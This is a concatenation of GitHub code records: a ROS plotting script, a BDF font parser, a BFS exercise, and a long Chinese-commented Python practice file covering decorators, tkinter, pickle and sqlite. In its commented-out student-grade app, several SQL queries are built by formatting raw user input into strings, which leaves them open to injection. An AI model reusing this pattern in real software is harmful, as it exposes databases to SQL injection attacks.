self.mrd_model.predict(self.latent_X, Yindex=0)\n return joint_angles[0][0,:].tolist()\n\n\n def get_whill_movement(self, joint_angles):\n x_predict, _ = self.mrd_model.Y0.infer_newX(np.array(joint_angles, ndmin=2), optimize=False)\n y_out = self.mrd_model.predict(x_predict.mean, Yindex=1)\n return np.mean(y_out[0])\n\n\ndef main():\n rospy.init_node('some_random_name')\n rospy.on_shutdown(save_data)\n\n model_file = os.path.join(files_dir, 'mrd_model.pkl')\n\n max_points = 200\n timer_freq = 5.0\n dim1 = 0\n dim2 = 1\n resolution = 50\n manual = False\n\n player = ModelPlayer(model_file, max_points, timer_freq, dim1, dim2, resolution, manual)\n player.spin()\n\nif __name__ == '__main__':\n main()\n","repo_name":"ravijo/HSI2020","sub_path":"scripts/plot_latent_and_whill.py","file_name":"plot_latent_and_whill.py","file_ext":"py","file_size_in_byte":10640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74273497423","text":"\nclass BDF:\n def __init__(self, f):\n self.file = f\n\n f.seek(0)\n\n self.characters = {}\n\n metadata = True\n character = False\n bitmap_lines_left = 0\n bounds = None\n bitmap = None\n code_point = None\n character_name = None\n for lineno, line in enumerate(self.file.readlines()):\n if lineno == 0 and not line.startswith(\"STARTFONT 2.1\"):\n raise ValueError(\"Unsupported file version\")\n if line.startswith(\"CHARS \"):\n metadata = False\n if line.startswith(\"SIZE\"):\n _, self.point_size, self.x_resolution, self.y_resolution = line.split()\n elif line.startswith(\"COMMENT\"):\n token, comment = line.split(\" \", 1)\n print(comment.strip(\"\\n\\\"\"))\n elif line.startswith(\"STARTCHAR\"):\n print(lineno, line.strip())\n _, character_name = line.split()\n character = True\n elif line.startswith(\"ENDCHAR\"):\n character = False\n elif line.startswith(\"BBX\"):\n _, x, y, dx, dy = line.split()\n x = int(x)\n y = int(y)\n dx = int(dx)\n dy = int(dy)\n bounds = (x, y, dx, dy)\n character = False\n elif line.startswith(\"BITMAP\"):\n character = False\n bitmap_lines_left = bounds[1]\n bitmap = []\n elif line.startswith(\"ENCODING\"):\n _, code_point = line.split()\n code_point = int(code_point)\n print(hex(code_point))\n elif bitmap_lines_left > 0:\n bits = int(line.strip(), 16)\n shift = 8 - bounds[0]\n bits >>= shift\n pixels = (\"{0:0\" + str(bounds[0]) +\"b}\").format(bits).replace(\"0\", \" \")\n bitmap.append(pixels)\n bitmap_lines_left -= 1\n\n if bitmap_lines_left == 0:\n self.characters[code_point] = {\"name\": character_name, \"bitmap\": bitmap}\n elif metadata:\n print(lineno, line.strip())\n","repo_name":"compromyse/raspi-ducky","sub_path":"circuitpython/tools/bitmap_font/adafruit_bitmap_font/pcf.py","file_name":"pcf.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"18901345331","text":"from collections import deque\n\nn=int(input())\na,b=map(int,input().split())\nm=int(input())\ngraph=[[]for _ in range(n+1)]\nvisited=[False]*(n+1)\nfor i in range(m):\n x,y=map(int,input().split())\n graph[x].append(y)\n graph[y].append(x)\n\ndef bfs(a,b):\n queue=deque([a])\n visited[a]=True\n while queue:\n v=queue.popleft()\n for i in graph[v]:\n if not visited[i]:\n visited[i]=visited[v]+1\n queue.append(i)\n return visited[b]\n\nprint(bfs(a,b)-1)","repo_name":"rawfishthelgh/codetest","sub_path":"백준 
문제모음/백준2644_2.py","file_name":"백준2644_2.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"36982637715","text":"\"\"\"\r\n#iterantion and yield\r\n\r\ndef ha(max):\r\n n,a,b=0,0,1\r\n while n< max:\r\n yield b\r\n a,b=b,a+b\r\n n+=1\r\nfor x in ha(5):\r\n print(x)\r\nf=ha(6)\r\nprint(next(f))\r\nprint(next(f))\r\nprint(next(f))\r\nprint(next(f))\r\nprint(next(f))\r\nprint(next(f))\r\nprint(\"_____________________\")\r\nclass MyNumbers:\r\n def __init__(self,max):\r\n self.n, self.a, self.b,self.max = 0, 0, 1 ,max\r\n def __iter__(self):\r\n return self\r\n def __next__(self):\r\n if self.nnum else 2\r\n else:\r\n break\r\n n+=1\r\n q[4]=\"The answer is \"+str(num)+\" you used 7 chances.\"\r\n con=guess(4) if n>=7 else guess(3)\r\n con=guess(5)\r\nprint(\"Bye-bye.\")\r\n\"\"\"\r\n#main\r\n\"\"\"\r\na=[3]\r\ndef ha():\r\n print(\"hahah\")\r\ndef wa():\r\n a[0]+=3\r\n print(a[0])\r\n\r\nif __name__ == '__main__':\r\n print('程序自身在运行')\r\n ha()\r\n wa()\r\nelse:\r\n print('我来自另一模块')\r\n\"\"\"\r\n#字符串的输出\r\n\"\"\"\r\ntable = {'Google': 1, 'Runoob': 2, 'Taobao': 3}\r\nprint(table)\r\nprint('Runoob: {0[Runoob]:d}; Google: {0[Google]:d}; Taobao: {0[Taobao]:d}'.format(table))\r\nprint('Runoob: {Runoob:d}; Google: {Google:d}; Taobao: {Taobao:d}'.format(**table))\r\nfor x in range(1, 11):\r\n print(repr(x).center(2), repr(x*x).ljust(3), end=' ')\r\n print(repr(x*x*x).rjust(4))\r\nprint('{0} 和 {1}'.format('Google', 'Runoob'))\r\ntable = {'G': 1, 'Runoob': 2, 'Taobao': 3}\r\nfor name, number in table.items():\r\n print('{0:10} ==> {1:10f}'.format(name, number))\r\n\"\"\"\r\n#最大公约数和最小公倍数\r\n\"\"\"\r\ndef gcd_lcm(x,y):\r\n if x%y==0:\r\n return y\r\n else:\r\n return gcd_lcm(y,x%y)\r\na,b=map(int,input(\"Pleae input two integers: :\").split())\r\nx=gcd_lcm(a,b)\r\nprint(\"The GCD of them is %d\\nThe LCM of them is %d\" %(x,a*b/x))\r\n\"\"\"\r\n#legendre\r\n\"\"\"\r\ndef legendre(x,n):\r\n if n==0:\r\n return 1\r\n elif n==1:\r\n return x\r\n else:\r\n return ((2*n-1)*x*legendre(x,n-1)-(n-1)*legendre(x,n-2))/n \r\na=float(input(\"Please input x:\"))\r\nb=int(input(\"Please input n:\"))\r\nprint(\"The result is %s\"%str(legendre(a,b)))\r\n\"\"\"\r\n#calender\r\n'''\r\nday=(myyear-1800)*365+mymonth*30\r\nfor x in range(1800,myyear+1):\r\n day+=isLeap(x)\r\nfor x in range(1,mymonth+1):\r\n day+=monthDay(x)\r\nprint(day//7,day%7)\r\n'''\r\n\"\"\"\r\nweek={'sun':-2,'mon':-1,'tue':0,'wed':1,'thu':2,'fri':3,'sat':4}\r\nweekday=list(week.keys())\r\ndef isLeap(x):\r\n x=1 if x%400==0 or x%4==0 and x%100!=0 else 0\r\n return x\r\ndef monthDay(x): \r\n if x<=7:\r\n y=31 if x%2==1 else 30 \r\n else:\r\n y=31 if x%2==0 else 30\r\n y=28+isLeap(myyear) if x==2 else y\r\n return y\r\ndef prWeek():\r\n print('-'*49)\r\n for x in range(7):\r\n print(weekday[x].title().rjust(7),end=\"\")\r\n print('')\r\ndef calender():\r\n for x in range(6):\r\n for y in range(7):\r\n if y<=5 and week[weekday[y]]>week[weekday[y+1]]:\r\n week[weekday[y+1]]+=7\r\n a=week[weekday[y]]+7*x\r\n b=str(a) if a>0 and a<=monthDay(mymonth) else ''\r\n print(b.rjust(7),end=\"\")\r\n print(\"\")\r\ndef firstWeek():\r\n for z in range(1800,myyear):\r\n for y in range(7):\r\n week[weekday[y]]=week[weekday[y]]-(365+isLeap(z))%7\r\n if week[weekday[y]]<=-6 :\r\n week[weekday[y]]+=7\r\n if mymonth>1:\r\n for x in range(mymonth-1):\r\n for y in range(7):\r\n week[weekday[y]]=week[weekday[y]]+28-monthDay(x+1) \r\n if week[weekday[y]]<=-6 :\r\n 
week[weekday[y]]+=7\r\nmyyear,mymonth=map(int,input(\"please input the year and month:\").split())\r\nfirstWeek()\r\nprWeek()\r\ncalender()\r\n\"\"\"\r\n#登录\r\n'''\r\nclass account:\r\n name=''\r\n code=''\r\n agcode='' \r\n def __init__(self):\r\n self.name=input(\"请输入用户名:\")\r\n while(1):\r\n self.code=input(\"请输入密码: \")\r\n if self.exco(self.code)=='':break \r\n while(1):\r\n self.agcode=input('请再次输入密码:')\r\n if self.agcode==self.code:break\r\n print(\"两次输入的密码不一致\")\r\n print(\"注册成功!\")\r\n def exco(self,x):\r\n y=''\r\n y='密码必须包含字母' if x.isdigit() else y\r\n y='密码必须包含数字' if x.isalpha() else y\r\n y='密码长度至少8位' if len(x)<8 else y\r\n if y!='':print(y)\r\n return y\r\n def log(self):\r\n myname,mycode=input('请输入用户名:'),input('请输入密码登录,你有三次机会:')\r\n n=0\r\n while(n<2): \r\n if self.name==myname and self.code==mycode:\r\n print('登陆成功')\r\n break\r\n else:\r\n mycode=input('密码错误,请重新输入:')\r\n n+=1\r\n else:print('登陆失败')\r\nme=account()\r\nme.log()\r\n'''\r\n#创建用户登录(未完成)\r\n'''\r\nclass account:\r\n code=''\r\n agcode='' \r\n def __init__(self):\r\n \r\n while(1):\r\n self.code=input(\"请输入密码: \")\r\n if self.exco(self.code)=='':break \r\n while(1):\r\n self.agcode=input('请再次输入密码:')\r\n if self.agcode==self.code:break\r\n print(\"两次输入的密码不一致\")\r\n print(\"注册成功!\")\r\n def exco(self,x):\r\n y=''\r\n y='密码必须包含字母' if x.isdigit() else y\r\n y='密码必须包含数字' if x.isalpha() else y\r\n y='密码长度至少8位' if len(x)<8 else y\r\n if y!='':print(y)\r\n return y\r\n def log(self):\r\n myname,mycode=input('请输入用户名:'),input('请输入密码登录,你有三次机会:')\r\n n=0\r\n while(n<2): \r\n if buname==myname and self.code==mycode:\r\n print('登陆成功')\r\n break\r\n else:\r\n mycode=input('密码错误,请重新输入:')\r\n n+=1\r\n else:print('登陆失败')\r\nwhile(1):\r\n name=input('请输入用户名:')\r\n buname=name\r\n locals()[name]=account()\r\n locals()[name].log()\r\n'''\r\n#格式化输入与输出\r\n\"\"\"\r\ntable = {'Google': 1, 'Runoob': 2, 'Taobao': 3}\r\nprint('{0[Runoob]:5}{0[Taobao]:2} {1:8}{2:3}'.format(table,\"hah\",99))\r\n\"\"\"\r\n'''\r\nf = open(\"C:/Users/早开的晚霞/Desktop/foo.txt\", \"rb+\")\r\nf.write(b'0123456789abcdef')\r\n#f.write( \"Python 是一个非常好的语言。\\n是的,的确非常好!!\\n\" )\r\n#str1=f.readlines()\r\n#print(str1)\r\n#for line in f:\r\n# print(line, end='')\r\nprint(f.tell())\r\nf.seek(-1,2)\r\nprint(f.read(1))\r\n# 关闭打开的文件\r\nf.close()\r\n'''\r\n'''\r\n\r\nimport pickle\r\n\r\n# 使用pickle模块将数据对象保存到文件\r\ndata1 = {'a': [1, 2.0, 3, 4+6j],\r\n 'b': ('string', u'Unicode string'),\r\n 'c': None}\r\n\r\nselfref_list = [1, 2, 3]\r\nselfref_list.append(selfref_list)\r\n\r\noutput = open('data.pkl', 'wb')\r\n\r\n# Pickle dictionary using protocol 0.\r\npickle.dump(data1, output)\r\n\r\n# Pickle the list using the highest protocol available.\r\npickle.dump(selfref_list, output, -1)\r\n\r\noutput.close()\r\n'''\r\n'''\r\nimport pprint, pickle\r\n\r\n#使用pickle模块从文件中重构python对象\r\npkl_file = open('data.pkl', 'rb')\r\n\r\ndata1 = pickle.load(pkl_file)\r\npprint.pprint(data1)\r\n\r\ndata2 = pickle.load(pkl_file)\r\npprint.pprint(data2)\r\n\r\npkl_file.close()\r\n'''\r\n#装饰器1\r\n\"\"\"\r\ndef hi():\r\n def greet():\r\n return \"hah\"\r\n def welcom():\r\n return \"233\"\r\n return greet if 2 else welcom\r\nprint(hi()())\r\ndef hello():\r\n return \"233\"\r\ndef do(x):\r\n print(x())\r\ndo(hello)\r\n\r\ndef deco(x):\r\n def inf():\r\n print(\"www\")\r\n x()\r\n print(\"qqqq\")\r\n return inf\r\ndef rede():\r\n print(\"eeee\")\r\nrede()\r\nrede=deco(rede)\r\nrede()\r\n@deco # @deco等价于 ha=deco(ha)\r\ndef ha():\r\n print(\"nnnn\")\r\nha()\r\nprint(ha.__name__) 
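# (Illustrative aside, assuming only the standard library: the print above
# shows 'inf' because deco() returns its inner function, whose metadata
# shadows ha's. A self-contained repro of that metadata loss:)
def plain_deco(f):
    def inner():
        return f()
    return inner

@plain_deco
def target():
    """original docstring"""
    return "ok"

print(target.__name__)  # -> 'inner', not 'target'
print(target.__doc__)   # -> None: inner() has no docstring of its own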
#ha被inf取代了\r\n#以下是调用functools.wrpas函数解决\r\nfrom functools import wraps\r\ndef a_new_decorator(a_func):\r\n @wraps(a_func) #将wraps函数作为装饰\r\n def wrapTheFunction():\r\n print(\"I am doing some boring work before executing a_func()\")\r\n a_func()\r\n print(\"I am doing some boring work after executing a_func()\")\r\n return wrapTheFunction\r\n \r\n@a_new_decorator\r\ndef a_function_requiring_decoration():\r\n \r\n print(\"I am the function which needs some decoration to \"\r\n \"remove my foul smell\")\r\na_function_requiring_decoration()\r\nprint(a_function_requiring_decoration.__name__) #正常输出\r\n\"\"\"\r\n#装饰器2\r\n\"\"\"\r\nfrom functools import wraps\r\ndef decorator_name(f):\r\n @wraps(f)\r\n def decorated():\r\n if not can_run:\r\n return \"Function will not run\"\r\n return f()\r\n return decorated\r\n \r\n@decorator_name\r\ndef func():\r\n return(\"Function is running\")\r\n \r\ncan_run = True\r\nprint(func())\r\n# Output: Function is running\r\n \r\ncan_run = False\r\nprint(func())\r\n\r\n\r\ndef logit(func):\r\n @wraps(func)\r\n def with_logging(*args, **kwargs):\r\n print(func.__name__ + \" was called\")\r\n return func(*args, **kwargs)\r\n return with_logging\r\n \r\n@logit\r\ndef addition_func(x):\r\n\r\n return x + x\r\n \r\n \r\nresult = addition_func(4)\r\nprint(result)\r\n\r\n\r\n\r\nfrom functools import wraps\r\ndef logit(logfile='out.txt'):\r\n def logging_decorator(func):\r\n @wraps(func)\r\n def wrapped_function(*args, **kwargs):\r\n log_string = func.__name__ + \" was called\"\r\n print(log_string)\r\n # 打开logfile,并写入内容\r\n with open(logfile, 'a') as opened_file:\r\n # 现在将日志打到指定的logfile\r\n opened_file.write(log_string + '\\n')\r\n return func(*args, **kwargs)\r\n return wrapped_function\r\n return logging_decorator \r\n@logit()\r\ndef myfunc1():\r\n pass\r\n \r\nmyfunc1()\r\n# Output: myfunc1 was called\r\n# 现在一个叫做 out.log 的文件出现了,里面的内容就是上面的字符串\r\n\r\n@logit(logfile='func2.txt')\r\ndef myfunc2():\r\n pass\r\n \r\nmyfunc2()\r\n# Output: myfunc2 was called\r\n# 现在一个叫做 func2.log 的文件出现了,里面的内容就是上面的字符串\r\n\r\nfrom functools import wraps\r\nclass wa():\r\n a=1\r\n b=2\r\n def __call__(self,x): #类的调用函数\r\n @wraps(x)\r\n def ha():\r\n print(self.a+1)\r\n return x()\r\n return ha\r\n@wa()\r\ndef we():\r\n print(\"2333\")\r\nwe()\r\n\"\"\"\r\n\r\n#利用__或者property装饰器进行私有变量的定义\r\n\"\"\"\r\nclass Vector2D(object):\r\n def __init__(self, x, y):\r\n self.x = float(x)\r\n self.y = float(y)\r\n\r\n @property\r\n def a(self):\r\n return self.x\r\n @property\r\n def b(self):\r\n return self.y\r\n @b.setter\r\n def b(self,c):\r\n self.y=c\r\n\r\nv = Vector2D(3, 4)\r\nprint(v.a, v.b)\r\nv.b = 8 \r\nprint(v.b)\r\n\r\nclass ha():\r\n def __init__(self):\r\n self.__a=3\r\n def wee(self):\r\n return self.__a+6\r\njj=ha()\r\nc=jj.wee()\r\nprint(c)\r\nprint(jj.__a)\r\n\"\"\"\r\n\r\n#__slots__对类的外部添加进行限制,内部变量命名不能重复,如果重复需要用__init__进行命名\r\n\"\"\"\r\nclass ha():\r\n __slots__ = [\"x\", 'y']\r\n def __init__(self):\r\n self.x = 1\r\nwe=ha()\r\nwe.z=4\r\nprint(we.z)\r\n\r\nclass Dog(object):\r\n def __init__(self, name):\r\n self.name = name\r\n\r\n\r\nclass Cat(object):\r\n __slots__ = [\"name\"]\r\n\r\n def __init__(self, name):\r\n self.name = name\r\n\r\nd = Dog(\"dog\")\r\nd.age = 23\r\nprint(d.age)\r\nc = Cat(\"cat\")\r\nprint(c.name)\r\nc.age = 24\r\n\r\nclass ha():\r\n \r\n __slots__ = []\r\n s=3\r\nwe=ha()\r\n\r\nprint(we.s)\r\nwe.x=4\r\nprint(we.x)\r\n\r\n\"\"\"\r\n#实验二\r\n\"\"\"\r\nnum=[0]\r\nstudent=[]\r\na=0\r\ntxt=('学号','姓名','数学','语文','英语')\r\ndef welcome():\r\n print(\"欢迎进入教务处学生成绩系统\")\r\n 
print('1. 学生成绩录入\\n2. 学生成绩修改\\n3. 查询学生成绩\\n4. 学生成绩排名\\n5. 退出系统')\r\n num[0]=int(input(\"请输入功能序号进入相应功能:\"))\r\ndef again(x):\r\n def txtpr():\r\n x()\r\n if input(\"\\n是否继续(1-继续)(0-停止):\")=='1':return txtpr() \r\n return txtpr\r\ndef prtxt():\r\n for x in range(5):print(txt[x].rjust(6+len(txt[x])), end='')\r\n print(\"\")\r\n for z in range(a):\r\n for x in range(5):\r\n print(student[z][x].rjust(7+len(txt[x])),end='')\r\n print('')\r\n\r\n@again\r\ndef entry(): \r\n student.append([input(\"请输入学生%s:\"%txt[x]) for x in range(5)])\r\n global a\r\n a+=1\r\n prtxt()\r\n@again\r\ndef chansco():\r\n am=input(\"请输入学生学号:\")\r\n q=0\r\n k=0\r\n for z in range(a):\r\n if am in student[z][0]:q=z\r\n print('1. 数学成绩修改\\n2. 语文成绩修改\\n3. 英语成绩修改\\n ')\r\n k=int(input(\"请输入功能序号进入相应功能:\"))\r\n if k==1:student[q][2]=input(\"数学成绩修改为:\")\r\n elif k==2:student[q][3]=input(\"语文成绩修改为:\")\r\n else:student[q][4]=input(\"英语成绩修改为:\") \r\n@again\r\ndef check():\r\n am=input(\"请输入学生学号:\")\r\n q=0\r\n k=0\r\n for z in range(a): \r\n if am in student[z][0]:q=z\r\n for x in range(5):print(txt[x].rjust(8), end='')\r\n print(\"\")\r\n for x in range(5):print(student[q][x].rjust(7+len(txt[x])),end='')\r\n@again\r\ndef level():\r\n print(\"1.��照学号排序\\n2.按照姓名排序\\n3.按照数学成绩排序\\n4.按照语文成绩排序\\n5.按照英语成绩排序\\n6.按照总分排序\")\r\n k=int(input(\"请输入功能序号进入相应功能:\"))\r\n def takese(ele):\r\n return (ele[k-1]) if k!=6 else int(ele[2])+int(ele[3])+int(ele[4])\r\n student.sort(key=takese,reverse=True)\r\n prtxt()\r\nwhile num[0]!=5:\r\n welcome()\r\n if num[0]==1:\r\n entry()\r\n if num[0]==2:\r\n chansco()\r\n if num[0]==3:\r\n check()\r\n if num[0]==4:\r\n level()\r\n\"\"\"\r\n#tkinter模块1\r\n\"\"\"\r\nimport tkinter as tk\r\nws=tk.Tk()\r\nws.title('hah')\r\nws.geometry('500x300')\r\nvar=tk.StringVar()\r\nl=tk.Label(ws,textvariable=var,bg='green', font=('Arial', 12), width=30, height=2)\r\nl.pack()\r\non_hit=False\r\ndef hit():\r\n global on_hit\r\n if on_hit == False:\r\n on_hit = True\r\n var.set('you hit me')\r\n else:\r\n on_hit = False\r\n var.set('')\r\nb=tk.Button(ws,text=\"233\",font=('Arial', 12),activebackground='red',width=10,height=1,command=hit)\r\nb.pack()\r\ne1=tk.Entry(ws,show=None)\r\ne2=tk.Entry(ws,show='2')\r\ne1.pack()\r\ne2.pack()\r\ndef insert_point(): # 在鼠标焦点处插入输入内容\r\n vars = e1.get()\r\n t.insert('insert', vars)\r\ndef insert_end(): # 在文本框内容最后接着插入输入内容\r\n vars = e1.get()\r\n t.insert('end', vars)\r\nb1 = tk.Button(ws, text='insert point', width=10,\r\n height=2, command=insert_point)\r\nb1.pack()\r\nb2 = tk.Button(ws, text='insert end', width=10,\r\n height=2, command=insert_end)\r\nb2.pack()\r\nt = tk.Text(ws, height=3)\r\nt.pack()\r\nws.mainloop()\r\n\"\"\"\r\n#tkinter2\r\n\"\"\"\r\nimport tkinter as tk\r\nwindow=tk.Tk()\r\nwindow.geometry('300x300')\r\nvar2 = tk.StringVar()\r\nvar2.set((1,2,3,4)) # 为变量var2设置值\r\n# 创建Listbox\r\nlb = tk.Listbox(window, listvariable=var2,width=10,height=2)\r\nlb.pack()\r\nvar = tk.StringVar() # 定义一个var用来将radiobutton的值和Label的值联系在一起.\r\nl = tk.Label(window, bg='yellow', width=20, text='empty')\r\nl.pack()\r\ndef print_selection():\r\n l.config(bg='blue')\r\nr1 = tk.Radiobutton(window, text=' A', variable=var, value='A', command=print_selection)\r\nr1.pack()\r\nr2 = tk.Radiobutton(window, text='B', variable=var, value='B', command=print_selection)\r\nr2.pack()\r\nc1 = tk.Checkbutton(window, text='Python',variable=var, onvalue=1, offvalue=0, command=print_selection) # 传值原理类似于radiobutton部件\r\nc1.pack()\r\nc2 = tk.Checkbutton(window, text='C++',variable=var, onvalue=1, offvalue=0, 
command=print_selection)\r\nc2.pack()\r\ndef print_selection1(v):\r\n l.config(text='you have'+v)\r\ns = tk.Scale(window, label='try me', from_=0, to=10, orient=tk.HORIZONTAL, length=200, showvalue=0,tickinterval=2, resolution=0.01, command=print_selection1)\r\ns.pack()\r\n\"\"\"\r\n\"\"\"\r\nimport tkinter as tk \r\n \r\nwindow = tk.Tk()\r\nwindow.title('My Window')\r\nwindow.geometry('500x300') \r\ncanvas = tk.Canvas(window, bg='green', height=200, width=500)\r\nimage_file = tk.PhotoImage(file='pic.gif') \r\nimage = canvas.create_image(250, 0, anchor='n',image=image_file) \r\n#image=canvas.create_image(250,0,anchor='n',image=tk.PhotoImage(file='pic.gif'))\r\ncanvas.pack()\r\ndef moveit():\r\n canvas.move(image, 2, 2) \r\n \r\n\r\nb = tk.Button(window, text='move item',command=moveit).pack()\r\nwindow.mainloop()\r\n\"\"\"\r\n#双重字典查询\r\n\"\"\"\r\nhit = {\r\n'01':{'name':'航天学院', 'url':'http://sa.hit.edu.cn/'},\r\n'02':{'name':'电信学院', 'url':'http://seie.hit.edu.cn/'},\r\n'03':{'name':'机电学院', 'url':'http://sme.hit.edu.cn/'},\r\n'04':{'name':'材料学院', 'url':'http://mse.hit.edu.cn/'},\r\n'05':{'name':'能源学院', 'url':'http://power.hit.edu.cn/'},\r\n'06':{'name':'电气学院', 'url':'http://hitee.hit.edu.cn/'},\r\n'07':{'name':'仪器学院', 'url':'http://ise.hit.edu.cn/'},\r\n'08':{'name':'数学学院', 'url':'http://math.hit.edu.cn/'},\r\n'09':{'name':'物理学院', 'url':'http://physics.hit.edu.cn/'},\r\n'10':{'name':'经管学院', 'url':'http://som.hit.edu.cn/'},\r\n'11':{'name':'土木学院', 'url':'http://civil.hit.edu.cn/'},\r\n'12':{'name':'环境学院', 'url':'http://env.hit.edu.cn/'},\r\n'13':{'name':'建筑学院', 'url':'http://jzxy.hit.edu.cn/'},\r\n'14':{'name':'交通学院', 'url':'http://jtxy.hit.edu.cn/'},\r\n'15':{'name':'化工学院', 'url':'http://chemeng.hit.edu.cn/'},\r\n'16':{'name':'生命学院', 'url':'http://life.hit.edu.cn/'},\r\n'17':{'name':'外语学院', 'url':'http://fls.hit.edu.cn/'},\r\n'18':{'name':'人文学院', 'url':'http://rwxy.hit.edu.cn/'},\r\n'19':{'name':'计算机学院', 'url':'http://cs.hit.edu.cn/'},\r\n'20':{'name':'马克思学院', 'url':'http://marx.hit.edu.cn/'}\r\n}\r\nnum=0\r\ndef welcome():\r\n global num\r\n print(\"欢迎进入教务处学院查询系统\")\r\n print('1. 按编号查询\\n2. 按名称查询\\n3. 
退出')\r\n num=int(input(\"请输��功能序号进入相应功能:\"))\r\ndef nu():\r\n x=input('请输入编号:')\r\n try:print(hit[x])\r\n except KeyError:\r\n print(\"查询失败\")\r\n return nu()\r\ndef na():\r\n x=input('请输入学院名称:')\r\n v=iter(hit.values())\r\n for i in range(20):\r\n s=next(v)\r\n if s['name']==x:return '0'+str(i+1)+'\\t'+s['url'] if i+1<10 else str(i+1)+'\\t'+s['url']\r\n else:\r\n print(\"查询失败\")\r\n return na()\r\n \r\nwhile(1):\r\n welcome()\r\n if num==1:nu()\r\n elif num==2:print(na())\r\n else:break\r\n\"\"\"\r\n\r\n#sqlitey与tkinter运用实例\r\n'''\r\nimport sqlite3 as sq\r\nimport tkinter as tk\r\nimport tkinter.messagebox \r\ndef entry():\r\n display.frame.pack_forget()\r\n fr=tk.Frame(display.ws)\r\n fr.pack(fill=\"both\", expand=True)\r\n def ha():\r\n fr.pack_forget()\r\n display.frame.pack()\r\n display.ws.mainloop()\r\n for i in range(5):l1=tk.Label(fr,text=tex[i]+\":\").place(x=150,y=40+i*30)\r\n t1=tk.Entry(fr,show = None)\r\n t1.place(x=220,y=40)\r\n t2=tk.Entry(fr,show = None)\r\n t2.place(x=220,y=70)\r\n t3=tk.Entry(fr,show = None)\r\n t3.place(x=220,y=100)\r\n t4=tk.Entry(fr,show = None)\r\n t4.place(x=220,y=130)\r\n t5=tk.Entry(fr,show = None)\r\n t5.place(x=220,y=160)\r\n def sub():\r\n try:\r\n c.execute(\"insert into student values({0},'{1}',{2},{3},{4})\".format(t1.get(),t2.get(),t3.get(),t4.get(),t5.get()))\r\n con.commit()\r\n except : tk.messagebox.showwarning(title='警告', message='请勿重复提交学生信息!')\r\n s1=tk.Button(fr,text=\"提交\",activebackground='#0000a3',command=sub).place(x=220,y=190)\r\n s2=tk.Button(fr,text=\"结束\",activebackground='#0000a3',command=ha).place(x=300,y=190)\r\n display.ws.mainloop()\r\ndef chansco():\r\n display.frame.pack_forget()\r\n fr=tk.Frame(display.ws)\r\n fr.pack(fill=\"both\", expand=True)\r\n def ha():\r\n fr.pack_forget()\r\n display.frame.pack()\r\n display.ws.mainloop()\r\n l1=tk.Label(fr,text=\"学生学号:\").place(x=150,y=40)\r\n t1=tk.Entry(fr,show = None)\r\n t1.place(x=220,y=40)\r\n t2=tk.Entry(fr,show = None)\r\n t2.place(x=220,y=70)\r\n var1 = tk.StringVar() \r\n var2 = tk.StringVar()\r\n var1.set('修改项目')\r\n var2.set(('姓名','语文',\"数学\",\"英语\"))\r\n def gai():\r\n try:\r\n if var1.get()!='姓名':v=list(c.execute(\"update student set {0}={1} where 学号={2} \".format(var1.get(),t2.get(),t1.get())))\r\n else:v=list(c.execute(\"update student set {0}='{1}' where 学号={2} \".format(var1.get(),t2.get(),t1.get())))\r\n con.commit()\r\n except :tk.messagebox.showwarning(title='警告', message='请按照正确格式输入!')\r\n def wa(event):\r\n lb.place(x=150,y=100,width=60,height=100) \r\n def za(event):\r\n lb.place_forget()\r\n def we(event):\r\n value = lb.get(lb.curselection())\r\n var1.set(value)\r\n l2=tk.Button(fr,textvariable=var1)\r\n l2.place(x=150,y=70) \r\n l2.bind(\"\", wa)\r\n l2.bind(\"\", za)\r\n lb = tk.Listbox(fr, listvariable=var2,width=20)\r\n lb.bind(\"\", wa)\r\n lb.bind(\"\", za) \r\n lb.bind('',we)\r\n s1=tk.Button(fr,text=\"提交\",activebackground='#0000a3',command=gai).place(x=220,y=160)\r\n s2=tk.Button(fr,text=\"结束\",activebackground='#0000a3',command=ha).place(x=300,y=160)\r\ndef check():\r\n display.frame.pack_forget()\r\n fr=tk.Frame(display.ws)\r\n fr.pack(fill=\"both\", expand=True)\r\n def ha():\r\n fr.pack_forget()\r\n display.frame.pack()\r\n display.ws.mainloop()\r\n l1=tk.Label(fr,text=\"学生学号:\").place(x=150,y=40)\r\n t1=tk.Entry(fr,show = None)\r\n t1.place(x=220,y=40)\r\n var1=tk.StringVar()\r\n var2=tk.StringVar()\r\n var3=tk.StringVar()\r\n var4=tk.StringVar()\r\n var5=tk.StringVar()\r\n ls1=tk.Label(fr,text=\"姓名\").place(x=120,y=70)\r\n 
ls2=tk.Label(fr,text=\"语文\").place(x=160,y=70)\r\n ls3=tk.Label(fr,text=\"英语\").place(x=200,y=70)\r\n ls4=tk.Label(fr,text=\"数学\").place(x=240,y=70)\r\n ls5=tk.Label(fr,text=\"总分\").place(x=280,y=70)\r\n lts1=tk.Label(fr,textvariable=var1)\r\n lts2=tk.Label(fr,textvariable=var2)\r\n lts3=tk.Label(fr,textvariable=var3)\r\n lts4=tk.Label(fr,textvariable=var4)\r\n lts5=tk.Label(fr,textvariable=var5)\r\n def cha():\r\n try:\r\n cur=list(c.execute(\"select * from student where 学号={}\".format(t1.get())))\r\n var1.set(cur[0][1])\r\n lts1.place(x=120,y=90)\r\n var2.set(cur[0][2])\r\n lts2.place(x=160,y=90)\r\n var3.set(cur[0][3])\r\n lts3.place(x=200,y=90)\r\n var4.set(cur[0][4])\r\n lts4.place(x=240,y=90)\r\n var5.set(cur[0][2]+cur[0][3]+cur[0][4])\r\n lts5.place(x=280,y=90)\r\n except :tk.messagebox.showwarning(title='警告', message='无当前学生信息!')\r\n s1=tk.Button(fr,text=\"查询\",activebackground='#0000a3',command=cha).place(x=220,y=160)\r\n s2=tk.Button(fr,text=\"结束\",activebackground='#0000a3',command=ha).place(x=300,y=160)\r\ndef level():\r\n display.frame.pack_forget()\r\n fr=tk.Frame(display.ws,width=500,height=300)\r\n fr.pack()\r\n def insco():\r\n sb=tk.Scrollbar(display.ws,orient=\"vertical\",)\r\n sb.place(x=50,y=25,height=200)\r\n tx=tk.Text(fr,bg=\"#00f\")\r\n tx.place(x=50,y=25,width=200,height=200)\r\n sb.configure(command=tx.yview)\r\n def ha():\r\n fr.pack_forget()\r\n display.frame.pack()\r\n display.ws.mainloop()\r\n var1 = tk.StringVar()\r\n var2 = tk.StringVar()\r\n var1.set('排序方式')\r\n var2.set(tex)\r\n def wa(event):\r\n 